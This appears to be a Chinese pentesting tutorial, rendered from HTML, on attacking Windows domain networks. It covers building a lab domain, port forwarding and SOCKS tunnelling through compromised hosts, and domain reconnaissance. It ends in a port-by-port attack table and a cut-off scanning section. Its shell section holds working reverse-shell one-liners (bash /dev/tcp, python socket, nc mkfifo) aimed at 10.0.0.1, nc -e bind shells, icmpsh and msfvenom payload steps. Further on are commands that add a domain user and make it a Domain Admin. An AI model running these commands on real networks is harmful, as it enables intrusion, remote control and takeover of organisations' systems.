</span-->
</li>
<li><span class="title">
<a href="#其他传输方式" title="其他传输方式">其他传输方式</a>
</span>
<!--span class="number">
20
</span-->
</li>
<li><span class="title">
<a href="#文件编译" title="文件编译">文件编译</a>
</span>
<!--span class="number">
21
</span-->
</li>
</ul>
</li>
</ul>
</li>
<li><span class="title">
<a href="#hash抓取" title="hash抓取">hash抓取</a>
</span>
<!--span class="number">
22
</span-->
<ul>
<li><ul>
<li><span class="title">
<a href="#hash简介" title="hash简介">hash简介</a>
</span>
<!--span class="number">
23
</span-->
</li>
<li><span class="title">
<a href="#本机hash+明文抓取" title="本机hash+明文抓取">本机hash+明文抓取</a>
</span>
<!--span class="number">
24
</span-->
</li>
<li><span class="title">
<a href="#win8+win2012明文抓取" title="win8+win2012明文抓取">win8+win2012明文抓取</a>
</span>
<!--span class="number">
25
</span-->
</li>
<li><span class="title">
<a href="#mimikatz" title="mimikatz">mimikatz</a>
</span>
<!--span class="number">
26
</span-->
</li>
<li><span class="title">
<a href="#ntds.dit的导出+quarkpwdump读取分析" title="ntds.dit的导出+QuarkPwDump读取分析">ntds.dit的导出+QuarkPwDump读取分析</a>
</span>
<!--span class="number">
27
</span-->
</li>
<li><span class="title">
<a href="#vssown.vbs-+-libesedb-+-ntdsxtract" title="vssown.vbs + libesedb + NtdsXtract">vssown.vbs + libesedb + NtdsXtract</a>
</span>
<!--span class="number">
28
</span-->
</li>
<li><span class="title">
<a href="#ntdsdump" title="ntdsdump">ntdsdump</a>
</span>
<!--span class="number">
29
</span-->
</li>
<li><span class="title">
<a href="#利用powershell(dsinternals)分析hash" title="利用powershell(DSInternals)分析hash">利用powershell(DSInternals)分析hash</a>
</span>
<!--span class="number">
30
</span-->
</li>
</ul>
</li>
</ul>
</li>
<li><span class="title">
<a href="#远程连接&&执行程序" title="远程连接&&执行程序">远程连接&&执行程序</a>
</span>
<!--span class="number">
31
</span-->
<ul>
<li><ul>
<li><span class="title">
<a href="#at&schtasks" title="at&schtasks">at&schtasks</a>
</span>
<!--span class="number">
32
</span-->
</li>
<li><span class="title">
<a href="#psexec" title="psexec">psexec</a>
</span>
<!--span class="number">
33
</span-->
</li>
<li><span class="title">
<a href="#wmic" title="wmic">wmic</a>
</span>
<!--span class="number">
34
</span-->
</li>
<li><span class="title">
<a href="#wmiexec.vbs" title="wmiexec.vbs">wmiexec.vbs</a>
</span>
<!--span class="number">
35
</span-->
</li>
<li><span class="title">
<a href="#smbexec" title="smbexec">smbexec</a>
</span>
<!--span class="number">
36
</span-->
</li>
<li><span class="title">
<a href="#powershell-remoting" title="powershell remoting">powershell remoting</a>
</span>
<!--span class="number">
37
</span-->
</li>
<li><span class="title">
<a href="#sc创建服务执行" title="SC创建服务执行">SC创建服务执行</a>
</span>
<!--span class="number">
38
</span-->
</li>
<li><span class="title">
<a href="#schtasks" title="schtasks">schtasks</a>
</span>
<!--span class="number">
39
</span-->
</li>
<li><span class="title">
<a href="#smb+mof-||-dll-hijacks" title="SMB+MOF || DLL Hijacks">SMB+MOF || DLL Hijacks</a>
</span>
<!--span class="number">
40
</span-->
</li>
<li><span class="title">
<a href="#pth-+-compmgmt.msc" title="PTH + compmgmt.msc">PTH + compmgmt.msc</a>
</span>
<!--span class="number">
41
</span-->
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p></p><h3 id="域环境搭建"><a name="域环境搭建" href="#域环境搭建"></a>域环境搭建</h3><p>准备:<br>DC: win2008<br>DM: win2003<br>DM: winxp</p><hr class="page"><p>win2008(域控)<br>1、修改计算机名:<br><img src="pic/1_domain/1.jpg" alt=""></p><p>2、配置固定ip:<br>其中网关设置错误,应该为192.168.206.2,开始默认的网管<br><img src="pic/1_domain/2.jpg" alt=""></p><p>3、服务器管理器—-角色:<br><img src="pic/1_domain/3.jpg" alt=""></p><p>4、配置域服务:<br>dos下面输入<code>dcpromo</code><br><img src="pic/1_domain/4.jpg" alt=""></p><p>Ps:这里可能会因为本地administrator的密码规则不合要求,导致安装失败,改一个强密码</p><p>5、设置林根域:<br>林就是在多域情况下形成的森林,根表示基础,其他在此根部衍生<br>具体见:<a href="http://angerfire.blog.51cto.com/198455/144123/">http://angerfire.blog.51cto.com/198455/144123/</a><br><img src="pic/1_domain/5.jpg" alt=""></p><p>6、<strong>域数据存放的地址</strong><br><img src="pic/1_domain/6.jpg" alt=""></p><hr class="page"><p>win2003、winxp和08配置差不多</p><p>注意点是:<br>1、配置网络<br>dns server应该为主域控ip地址<br><img src="pic/1_domain/7.jpg" alt=""></p><p>2、加入域控<br><img src="pic/1_domain/8.jpg" alt=""></p><hr class="page"><p>域已经搭建完成,主域控会生成一个<code>krbtgt</code>账号<br>他是Windows活动目录中使用的客户/服务器认证协议,为通信双方提供双向身份认证<br><img src="pic/1_domain/9.jpg" alt=""></p><p>参考:<br>AD域环境的搭建 基于Server 2008 R2<br><a href="http://www.it165.net/os/html/201306/5493.html">http://www.it165.net/os/html/201306/5493.html</a><br>Acitve Directory 域环境的搭建<br><a href="http://blog.sina.com.cn/s/blog_6ce0f2c901014okt.html">http://blog.sina.com.cn/s/blog_6ce0f2c901014okt.html</a></p><h3 id="端口转发&&边界代理"><a name="端口转发&&边界代理" href="#端口转发&&边界代理"></a>端口转发&&边界代理</h3><p>此类工具很多,测试一两个经典的。</p><h5 id="端口转发"><a name="端口转发" href="#端口转发"></a>端口转发</h5><p>1、windows<br>lcx</p><pre><code data-origin="<pre><code>监听1234端口,转发数据到2333端口
本地:lcx.exe -listen 1234 2333
将目标的3389转发到本地的1234端口
远程:lcx.exe -slave ip 1234 127.0.0.1 3389
</code></pre>">监听1234端口,转发数据到2333端口
本地:lcx.exe -listen 1234 2333
将目标的3389转发到本地的1234端口
远程:lcx.exe -slave ip 1234 127.0.0.1 3389
</code></pre><p>netsh<br>只支持tcp协议</p><pre><code data-origin="<pre><code>添加转发规则
netsh interface portproxy set v4tov4 listenaddress=192.168.206.101 listenport=3333 connectaddress=192.168.206.100 connectport=3389
此工具适用于,有一台双网卡服务器,你可以通过它进行内网通信,比如这个,你连接192.168.206.101:3388端口是连接到100上面的3389
删除转发规则
netsh interface portproxy delete v4tov4 listenport=9090
查看现有规则
netsh interface portproxy show all
xp需要安装ipv6
netsh interface ipv6 install
</code></pre>">添加转发规则
netsh interface portproxy set v4tov4 listenaddress=192.168.206.101 listenport=3333 connectaddress=192.168.206.100 connectport=3389
此工具适用于,有一台双网卡服务器,你可以通过它进行内网通信,比如这个,你连接192.168.206.101:3388端口是连接到100上面的3389
删除转发规则
netsh interface portproxy delete v4tov4 listenport=9090
查看现有规则
netsh interface portproxy show all
xp需要安装ipv6
netsh interface ipv6 install
</code></pre><p><img src="pic/3_proxy/7.jpg" alt=""></p><p>更加详细参考:<a href="http://aofengblog.blog.163.com/blog/static/631702120148573851740/">http://aofengblog.blog.163.com/blog/static/631702120148573851740/</a></p><p>2、linux<br>portmap<br><img src="pic/3_proxy/2.jpg" alt=""></p><pre><code data-origin="<pre><code>监听1234端口,转发数据到2333端口
本地:./portmap -m 2 -p1 1234 -p2 2333
将目标的3389转发到本地的1234端口
./portmap -m 1 -p1 3389 -h2 ip -p2 1234
</code></pre>">监听1234端口,转发数据到2333端口
本地:./portmap -m 2 -p1 1234 -p2 2333
将目标的3389转发到本地的1234端口
./portmap -m 1 -p1 3389 -h2 ip -p2 1234
</code></pre><p>iptables</p><pre><code data-origin="<pre><code>1、编辑配置文件/etc/sysctl.conf的net.ipv4.ip_forward = 1
2、关闭服务
service iptables stop
3、配置规则
需要访问的内网地址:192.168.206.101
内网边界web服务器:192.168.206.129
iptables -t nat -A PREROUTING --dst 192.168.206.129 -p tcp --dport 3389 -j DNAT --to-destination 192.168.206.101:3389
iptables -t nat -A POSTROUTING --dst 192.168.206.101 -p tcp --dport 3389 -j SNAT --to-source 192.168.206.129
4、保存&amp;&amp;重启服务
service iptables save &amp;&amp; service iptables start
</code></pre>">1、编辑配置文件/etc/sysctl.conf的net.ipv4.ip_forward = 1
2、关闭服务
service iptables stop
3、配置规则
需要访问的内网地址:192.168.206.101
内网边界web服务器:192.168.206.129
iptables -t nat -A PREROUTING --dst 192.168.206.129 -p tcp --dport 3389 -j DNAT --to-destination 192.168.206.101:3389
iptables -t nat -A POSTROUTING --dst 192.168.206.101 -p tcp --dport 3389 -j SNAT --to-source 192.168.206.129
4、保存&&重启服务
service iptables save && service iptables start
</code></pre><h5 id="socket代理"><a name="socket代理" href="#socket代理"></a>socket代理</h5><p>xsocks<br>1、windows<br><img src="pic/3_proxy/3.jpg" alt=""></p><p>进行代理后,在windows下推荐使用Proxifier进行socket连接,规则自己定义<br><img src="pic/3_proxy/4.jpg" alt=""></p><p>2、linux<br>进行代理后,推荐使用proxychains进行socket连接<br>kali下的配置文件:<br>/etc/proxychains.conf<br>添加一条:socks5 127.0.0.1 8888</p><p>然后在命令前加proxychains就进行了代理<br><img src="pic/3_proxy/5.jpg" alt=""></p><h5 id="神器推荐"><a name="神器推荐" href="#神器推荐"></a>神器推荐</h5><p><a href="http://rootkiter.com/EarthWorm/">http://rootkiter.com/EarthWorm/</a><br>跨平台+端口转发+socket代理结合体!darksn0w师傅的推荐。<br>ew_port_socket.zip</p><h5 id="基于http的转发与socket代理(低权限下的渗透)"><a name="基于http的转发与socket代理(低权限下的渗透)" href="#基于http的转发与socket代理(低权限下的渗透)"></a>基于http的转发与socket代理(低权限下的渗透)</h5><p>如果目标是在dmz里面,数据除了web其他出不来,便可以利用http进行<br>1、端口转发<br>tunna</p><pre><code data-origin="<pre><code>&gt;端口转发(将远程3389转发到本地1234)
&gt;python proxy.py -u http://lemon.com/conn.jsp -l 1234 -r 3389 -v
&gt;
&gt;连接不能中断服务(比如ssh)
&gt;python proxy.py -u http://lemon.com/conn.jsp -l 1234 -r 22 -v -s
&gt;
&gt;转发192.168.0.2的3389到本地
&gt;python proxy.py -u http://lemon.com/conn.jsp -l 1234 -a 192.168.0.2 -r 3389
</code></pre>">>端口转发(将远程3389转发到本地1234)
>python proxy.py -u http://lemon.com/conn.jsp -l 1234 -r 3389 -v
>
>连接不能中断服务(比如ssh)
>python proxy.py -u http://lemon.com/conn.jsp -l 1234 -r 22 -v -s
>
>转发192.168.0.2的3389到本地
>python proxy.py -u http://lemon.com/conn.jsp -l 1234 -a 192.168.0.2 -r 3389
</code></pre><p>具体参考:<a href="http://drops.wooyun.org/tools/650">http://drops.wooyun.org/tools/650</a></p><p>2、socks代理<br>reGeorg</p><pre><code data-origin="<pre><code>python reGeorgSocksProxy.py -u http://192.168.206.101/tunnel.php -p 8081
</code></pre>">python reGeorgSocksProxy.py -u http://192.168.206.101/tunnel.php -p 8081
</code></pre><p><img src="pic/3_proxy/6.jpg" alt=""></p><h5 id="ssh通道"><a name="ssh通道" href="#ssh通道"></a>ssh通道</h5><p><a href="http://staff.washington.edu/corey/fw/ssh-port-forwarding.html">http://staff.washington.edu/corey/fw/ssh-port-forwarding.html</a><br>1、端口转发</p><pre><code data-origin="<pre><code>本地访问127.0.0.1:port1就是host:port2(用的更多)
ssh -CfNg -L port1:127.0.0.1:port2 user@host #本地转发
访问host:port2就是访问127.0.0.1:port1
ssh -CfNg -R port2:127.0.0.1:port1 user@host #远程转发
可以将dmz_host的hostport端口通过remote_ip转发到本地的port端口
ssh -qTfnN -L port:dmz_host:hostport -l user remote_ip #正向隧道,监听本地port
可以将dmz_host的hostport端口转发到remote_ip的port端口
ssh -qTfnN -R port:dmz_host:hostport -l user remote_ip #反向隧道,用于内网穿透防火墙限制之类
</code></pre>">本地访问127.0.0.1:port1就是host:port2(用的更多)
ssh -CfNg -L port1:127.0.0.1:port2 user@host #本地转发
访问host:port2就是访问127.0.0.1:port1
ssh -CfNg -R port2:127.0.0.1:port1 user@host #远程转发
可以将dmz_host的hostport端口通过remote_ip转发到本地的port端口
ssh -qTfnN -L port:dmz_host:hostport -l user remote_ip #正向隧道,监听本地port
可以将dmz_host的hostport端口转发到remote_ip的port端口
ssh -qTfnN -R port:dmz_host:hostport -l user remote_ip #反向隧道,用于内网穿透防火墙限制之类
</code></pre><p>2、socks</p><pre><code data-origin="<pre><code>socket代理:
ssh -qTfnN -D port remotehost
</code></pre>">socket代理:
ssh -qTfnN -D port remotehost
</code></pre><p><img src="pic/3_proxy/8.jpg" alt=""></p><p>参考redrain大牛的文章:<a href="http://drops.wooyun.org/tips/5234">http://drops.wooyun.org/tips/5234</a></p><h3 id="获取shell"><a name="获取shell" href="#获取shell"></a>获取shell</h3><h5 id="常规shell反弹"><a name="常规shell反弹" href="#常规shell反弹"></a>常规shell反弹</h5><p>几个常用:</p><pre class="python hljs"><code class="python" data-origin="<pre><code class="python">1、bash -i &gt;&amp; /dev/tcp/10.0.0.1/8080 0&gt;&amp;1
2、python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
3、rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.0.0.1 1234 &gt;/tmp/f
</code></pre>"><span class="hljs-number">1</span>、bash -i >& /dev/tcp/<span class="hljs-number">10.0</span>.0.1/<span class="hljs-number">8080</span> <span class="hljs-number">0</span>>&<span class="hljs-number">1</span>
<span class="hljs-number">2</span>、python -c <span class="hljs-string">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span>
<span class="hljs-number">3</span>、rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i <span class="hljs-number">2</span>>&<span class="hljs-number">1</span>|nc <span class="hljs-number">10.0</span>.0.1 <span class="hljs-number">1234</span> >/tmp/f
</code></pre><p>各种语言一句话反弹shell:<br><a href="http://wiki.wooyun.org/pentest:%E5%90%84%E7%A7%8D%E8%AF%AD%E8%A8%80%E4%B8%80%E5%8F%A5%E8%AF%9D%E5%8F%8D%E5%BC%B9shell">http://wiki.wooyun.org/pentest:%E5%90%84%E7%A7%8D%E8%AF%AD%E8%A8%80%E4%B8%80%E5%8F%A5%E8%AF%9D%E5%8F%8D%E5%BC%B9shell</a></p><h5 id="突破防火墙的imcp_shell反弹"><a name="突破防火墙的imcp_shell反弹" href="#突破防火墙的imcp_shell反弹"></a>突破防火墙的imcp_shell反弹</h5><p>有时候防火墙可能对tcp进行来处理,然而对imcp并没有做限制的时候,就可以来一波~<br>kali运行(其中的ip地址填写为目标地址win03):<br><img src="pic/3_proxy/9.jpg" alt=""></p><p>win03运行:</p><pre><code data-origin="<pre><code>icmpsh.exe -t kali_ip -d 500 -b 30 -s 128
</code></pre>">icmpsh.exe -t kali_ip -d 500 -b 30 -s 128
</code></pre><p>可以看到icmp进行通信的<br><img src="pic/3_proxy/10.jpg" alt=""></p><h5 id="shell反弹不出的时候"><a name="shell反弹不出的时候" href="#shell反弹不出的时候"></a>Shell反弹不出的时候</h5><p>主要针对:本机kali不是外网或者目标在dmz里面反弹不出shell,可以通过这种直连shell然后再通过http的端口转发到本地的metasploit</p><pre><code data-origin="<pre><code>1、msfvenom -p windows/x64/shell/bind_tcp LPORT=12345 -f exe -o ./shell.exe
先生成一个bind_shell
2、本地利用tunna工具进行端口转发
python proxy.py -u http://lemon.com/conn.jsp -l 1111 -r 12345 v
3、
use exploit/multi/handler
set payload windows/x64/shell/bind_tcp
set LPORT 1111
set RHOST 127.0.0.1
</code></pre>">1、msfvenom -p windows/x64/shell/bind_tcp LPORT=12345 -f exe -o ./shell.exe
先生成一个bind_shell
2、本地利用tunna工具进行端口转发
python proxy.py -u http://lemon.com/conn.jsp -l 1111 -r 12345 v
3、
use exploit/multi/handler
set payload windows/x64/shell/bind_tcp
set LPORT 1111
set RHOST 127.0.0.1
</code></pre><p><img src="pic/3_proxy/1.jpg" alt=""></p><p>参考的文章:<br><a href="https://www.91ri.org/11722.html">https://www.91ri.org/11722.html</a></p><h5 id="正向shell"><a name="正向shell" href="#正向shell"></a>正向shell</h5><pre><code data-origin="<pre><code>1、nc -e /bin/sh -lp 1234
2、nc.exe -e cmd.exe -lp 1234
</code></pre>">1、nc -e /bin/sh -lp 1234
2、nc.exe -e cmd.exe -lp 1234
</code></pre><h3 id="信息收集(结构分析)"><a name="信息收集(结构分析)" href="#信息收集(结构分析)"></a>信息收集(结构分析)</h3><h5 id="基本命令"><a name="基本命令" href="#基本命令"></a>基本命令</h5><p>1、获取当前组的计算机名(一般remark有Dc可能是域控):</p><pre><code data-origin="<pre><code>C:\Documents and Settings\Administrator\Desktop&gt;net view
Server Name Remark
-----------------------------------------------------------------------------
\\DC1
\\DM-WINXP
\\DM_WIN03
The command completed successfully.
</code></pre>">C:\Documents and Settings\Administrator\Desktop>net view
Server Name Remark
-----------------------------------------------------------------------------
\\DC1
\\DM-WINXP
\\DM_WIN03
The command completed successfully.
</code></pre><p>2、查看所有域</p><pre><code data-origin="<pre><code>C:\Documents and Settings\Administrator\Desktop&gt;net view /domain
Domain
-----------------------------------------------------------------------------
CENTOSO
The command completed successfully.
</code></pre>">C:\Documents and Settings\Administrator\Desktop>net view /domain
Domain
-----------------------------------------------------------------------------
CENTOSO
The command completed successfully.
</code></pre><p>3、从计算机名获取ipv4地址</p><pre><code data-origin="<pre><code>C:\Documents and Settings\Administrator\Desktop&gt;ping -n 1 DC1 -4
Pinging DC1.centoso.com [192.168.206.100] with 32 bytes of data:
Reply from 192.168.206.100: bytes=32 time&lt;1ms TTL=128
Ping statistics for 192.168.206.100:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
</code></pre>">C:\Documents and Settings\Administrator\Desktop>ping -n 1 DC1 -4
Pinging DC1.centoso.com [192.168.206.100] with 32 bytes of data:
Reply from 192.168.206.100: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.206.100:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
</code></pre><p>Ps:如果计算机名很多的时候,可以利用bat批量ping获取ip</p><pre class="python hljs"><code class="python" data-origin="<pre><code class="python">@echo off
setlocal ENABLEDELAYEDEXPANSION
@FOR /F "usebackq eol=- skip=1 delims=\" %%j IN (`net view ^| find "命令成功完成" /v ^|find "The command completed successfully." /v`) DO (
@FOR /F "usebackq delims=" %%i IN (`@ping -n 1 -4 %%j ^| findstr "Pinging"`) DO (
@FOR /F "usebackq tokens=2 delims=[]" %%k IN (`echo %%i`) DO (echo %%k %%j)
)
)
</code></pre>"><span class="hljs-decorator">@echo off</span>
setlocal ENABLEDELAYEDEXPANSION
<span class="hljs-decorator">@FOR /F "usebackq eol=- skip=1 delims=\" %%j IN (`net view ^| find "命令成功完成" /v ^|find "The command completed successfully." /v`) DO (</span>
<span class="hljs-decorator">@FOR /F "usebackq delims=" %%i IN (`@ping -n 1 -4 %%j ^| findstr "Pinging"`) DO (</span>
<span class="hljs-decorator">@FOR /F "usebackq tokens=2 delims=[]" %%k IN (`echo %%i`) DO (echo %%k %%j)</span>
)
)
</code></pre><p><img src="pic/1_domain/10.jpg" alt=""></p><hr class="page"><p>以下执行命令时候会发送到域控查询,如果渗透的机器不是域用户权限,则会报错</p><pre><code data-origin="<pre><code>The request will be processed at a domain controller for domain
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
</code></pre>">The request will be processed at a domain controller for domain
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
</code></pre><p>4、查看域中的用户名</p><pre><code data-origin="<pre><code>dsquery user
或者:
C:\Users\lemon\Desktop&gt;net user /domain
User accounts for \\DC1
-------------------------------------------------------------------------------
Administrator Guest krbtgt
lemon pentest
The command completed successfully.
</code></pre>">dsquery user
或者:
C:\Users\lemon\Desktop>net user /domain
User accounts for \\DC1
-------------------------------------------------------------------------------
Administrator Guest krbtgt
lemon pentest
The command completed successfully.
</code></pre><p>5、查询域组名称</p><pre><code data-origin="<pre><code>C:\Users\lemon\Desktop&gt;net group /domain
Group Accounts for \\DC1
----------------------------------------------
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Read-only Domain Controllers
*Schema Admins
The command completed successfully.
</code></pre>">C:\Users\lemon\Desktop>net group /domain
Group Accounts for \\DC1
----------------------------------------------
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Read-only Domain Controllers
*Schema Admins
The command completed successfully.
</code></pre><p>6、查询域管理员</p><pre><code data-origin="<pre><code>C:\Users\lemon\Desktop&gt;net group "Domain Admins" /domain
Group name Domain Admins
Comment Designated administrators of the domain
Members
-----------------------------------------------------------
Administrator
</code></pre>">C:\Users\lemon\Desktop>net group "Domain Admins" /domain
Group name Domain Admins
Comment Designated administrators of the domain
Members
-----------------------------------------------------------
Administrator
</code></pre><p>7、添加域管理员账号</p><pre><code data-origin="<pre><code>添加普通域用户
net user lemon iam@L3m0n /add /domain
将普通域用户提升为域管理员
net group "Domain Admins" lemon /add /domain
</code></pre>">添加普通域用户
net user lemon iam@L3m0n /add /domain
将普通域用户提升为域管理员
net group "Domain Admins" lemon /add /domain
</code></pre><p>8、查看当前计算机名,全名,用户名,系统版本,工作站域,登陆域</p><pre><code data-origin="<pre><code>C:\Documents and Settings\Administrator\Desktop&gt;net config Workstation
Computer name \\DM_WIN03
Full Computer name DM_win03.centoso.com
User name Administrator
Workstation active on
NetbiosSmb (000000000000)
NetBT_Tcpip_{6B2553C1-C741-4EE3-AFBF-CE3BA1C9DDF7} (000C2985F6E4)
Software version Microsoft Windows Server 2003
Workstation domain CENTOSO
Workstation Domain DNS Name centoso.com
Logon domain DM_WIN03
COM Open Timeout (sec) 0
COM Send Count (byte) 16
COM Send Timeout (msec) 250
</code></pre>">C:\Documents and Settings\Administrator\Desktop>net config Workstation
Computer name \\DM_WIN03
Full Computer name DM_win03.centoso.com
User name Administrator
Workstation active on
NetbiosSmb (000000000000)
NetBT_Tcpip_{6B2553C1-C741-4EE3-AFBF-CE3BA1C9DDF7} (000C2985F6E4)
Software version Microsoft Windows Server 2003
Workstation domain CENTOSO
Workstation Domain DNS Name centoso.com
Logon domain DM_WIN03
COM Open Timeout (sec) 0
COM Send Count (byte) 16
COM Send Timeout (msec) 250
</code></pre><p>9、查看域控制器(多域控制器的时候,而且只能用在域控制器上)</p><pre><code data-origin="<pre><code>net group "Domain controllers"
</code></pre>">net group "Domain controllers"
</code></pre><p>10、查询所有计算机名称</p><pre><code data-origin="<pre><code>dsquery computer
下面这条查询的时候,域控不会列出
net group "Domain Computers" /domain
</code></pre>">dsquery computer
下面这条查询的时候,域控不会列出
net group "Domain Computers" /domain
</code></pre><p>11、net命令</p><pre><code data-origin="<pre><code>&gt;1、映射磁盘到本地
net use z: \\dc01\sysvol
&gt;2、查看共享
net view \\192.168.0.1
&gt;3、开启一个共享名为app$,在d:\config
&gt;net share app$=d:\config
</code></pre>">>1、映射磁盘到本地
net use z: \\dc01\sysvol
>2、查看共享
net view \\192.168.0.1
>3、开启一个共享名为app$,在d:\config
>net share app$=d:\config
</code></pre><p>12、跟踪路由</p><pre><code data-origin="<pre><code>tracert 8.8.8.8
</code></pre>">tracert 8.8.8.8
</code></pre><hr class="page"><h5 id="定位域控"><a name="定位域控" href="#定位域控"></a>定位域控</h5><p>1、查看域时间及域服务器的名字</p><pre><code data-origin="<pre><code>C:\Users\lemon\Desktop&gt;net time /domain
Current time at \\DC1.centoso.com is 3/21/2016 12:37:15 AM
</code></pre>">C:\Users\lemon\Desktop>net time /domain
Current time at \\DC1.centoso.com is 3/21/2016 12:37:15 AM
</code></pre><p>2、</p><pre><code data-origin="<pre><code>C:\Documents and Settings\Administrator\Desktop&gt;Nslookup -type=SRV _ldap._tcp.
*** Can't find server address for '_ldap._tcp.':
DNS request timed out.
timeout was 2 seconds.
*** Can't find server name for address 192.168.206.100: Timed out
Server: UnKnown
Address: 192.168.206.100
*** UnKnown can't find -type=SRV: Non-existent domain
</code></pre>">C:\Documents and Settings\Administrator\Desktop>Nslookup -type=SRV _ldap._tcp.
*** Can't find server address for '_ldap._tcp.':
DNS request timed out.
timeout was 2 seconds.
*** Can't find server name for address 192.168.206.100: Timed out
Server: UnKnown
Address: 192.168.206.100
*** UnKnown can't find -type=SRV: Non-existent domain
</code></pre><p>3、通过ipconfig配置查找dns地址</p><pre><code data-origin="<pre><code>ipconfig/all
</code></pre>">ipconfig/all
</code></pre><p>4、查询域控</p><pre><code data-origin="<pre><code>net group "Domain Controllers" /domain
</code></pre>">net group "Domain Controllers" /domain
</code></pre><hr class="page"><h5 id="端口收集"><a name="端口收集" href="#端口收集"></a>端口收集</h5><p>端口方面的攻防需要花费的时间太多,引用一篇非常赞的端口总结文章</p><table>
<thead>
<tr>
<th>端口号</th>
<th>端口说明</th>
<th>攻击技巧</th>
</tr>
</thead>
<tbody>
<tr>
<td>21/22/69</td>
<td>ftp/tftp:文件传输协议</td>
<td>爆破\嗅探\溢出\后门</td>
</tr>
<tr>
<td>22</td>
<td>ssh:远程连接</td>
<td>爆破OpenSSH;28个退格</td>
</tr>
<tr>
<td>23</td>
<td>telnet:远程连接</td>
<td>爆破\嗅探</td>
</tr>
<tr>
<td>25</td>
<td>smtp:邮件服务</td>
<td>邮件伪造</td>
</tr>
<tr>
<td>53</td>
<td>DNS:域名系统</td>
<td>DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙</td>
</tr>
<tr>
<td>67/68</td>
<td>dhcp</td>
<td>劫持\欺骗</td>
</tr>
<tr>
<td>110</td>
<td>pop3</td>
<td>爆破</td>
</tr>
<tr>
<td>139</td>
<td>samba</td>
<td>爆破\未授权访问\远程代码执行</td>
</tr>
<tr>
<td>143</td>
<td>imap</td>
<td>爆破</td>
</tr>
<tr>
<td>161</td>
<td>snmp</td>
<td>爆破</td>
</tr>
<tr>
<td>389</td>
<td>ldap</td>
<td>注入攻击\未授权访问</td>
</tr>
<tr>
<td>512/513/514</td>
<td>linux r</td>
<td>直接使用rlogin</td>
</tr>
<tr>
<td>873</td>
<td>rsync</td>
<td>未授权访问</td>
</tr>
<tr>
<td>1080</td>
<td>socket</td>
<td>爆破:进行内网渗透</td>
</tr>
<tr>
<td>1352</td>
<td>lotus</td>
<td>爆破:弱口令\信息泄漏:源代码</td>
</tr>
<tr>
<td>1433</td>
<td>mssql</td>
<td>爆破:使用系统用户登录\注入攻击</td>
</tr>
<tr>
<td>1521</td>
<td>oracle</td>
<td>爆破:TNS\注入攻击</td>
</tr>
<tr>
<td>2049</td>
<td>nfs</td>
<td>配置不当</td>
</tr>
<tr>
<td>2181</td>
<td>zookeeper</td>
<td>未授权访问</td>
</tr>
<tr>
<td>3306</td>
<td>mysql</td>
<td>爆破\拒绝服务\注入</td>
</tr>
<tr>
<td>3389</td>
<td>rdp</td>
<td>爆破\Shift后门</td>
</tr>
<tr>
<td>4848</td>
<td>glassfish</td>
<td>爆破:控制台弱口令\认证绕过</td>
</tr>
<tr>
<td>5000</td>
<td>sybase/DB2</td>
<td>爆破\注入</td>
</tr>
<tr>
<td>5432</td>
<td>postgresql</td>
<td>缓冲区溢出\注入攻击\爆破:弱口令</td>
</tr>
<tr>
<td>5632</td>
<td>pcanywhere</td>
<td>拒绝服务\代码执行</td>
</tr>
<tr>
<td>5900</td>
<td>vnc</td>
<td>爆破:弱口令\认证绕过</td>
</tr>
<tr>
<td>6379</td>
<td>redis</td>
<td>未授权访问\爆破:弱口令</td>
</tr>
<tr>
<td>7001</td>
<td>weblogic</td>
<td>Java反序列化\控制台弱口令\控制台部署webshell</td>
</tr>
<tr>
<td>80/443/8080</td>
<td>web</td>
<td>常见web攻击\控制台爆破\对应服务器版本漏洞</td>
</tr>
<tr>
<td>8069</td>
<td>zabbix</td>
<td>远程命令执行</td>
</tr>
<tr>
<td>9090</td>
<td>websphere控制台</td>
<td>爆破:控制台弱口令\Java反序列</td>
</tr>
<tr>
<td>9200/9300</td>
<td>elasticsearch</td>
<td>远程代码执行</td>
</tr>
<tr>
<td>11211</td>
<td>memcacache</td>
<td>未授权访问</td>
</tr>
<tr>
<td>27017</td>
<td>mongodb</td>
<td>爆破\未授权访问</td>
</tr>
</tbody>
</table><p>引用:<a href="https://www.91ri.org/15441.html">https://www.91ri.org/15441.html</a><br>wooyun也有讨论:<a href="http://zone.wooyun.org/content/18959">http://zone.wooyun.org/content/18959</a><br>对于端口也就是一个服务的利用,上文也只是大概的讲述,一些常见的详细利用与防御可以看看:<br><a href="http://wiki.wooyun.org/enterprise:server">http://wiki.wooyun.org/enterprise:server</a></p><h5 id="扫描分析"><a name="扫描分析" href="#扫描分析"></a>扫描分析</h5><p>1、nbtscan<br>获取mac地址:</p><pre><code data-origin="<pre><code>nbtstat -A 192.168.1.99
</code></pre>">nbtstat -A 192.168.1.99
</code></pre><p>获取计算机名\分析dc\是否开放共享</p><pre><code data-origin="<pre><code>nbtscan 192.168.1.0/24
</code></pre>">nbtscan 192.168.1.0/24
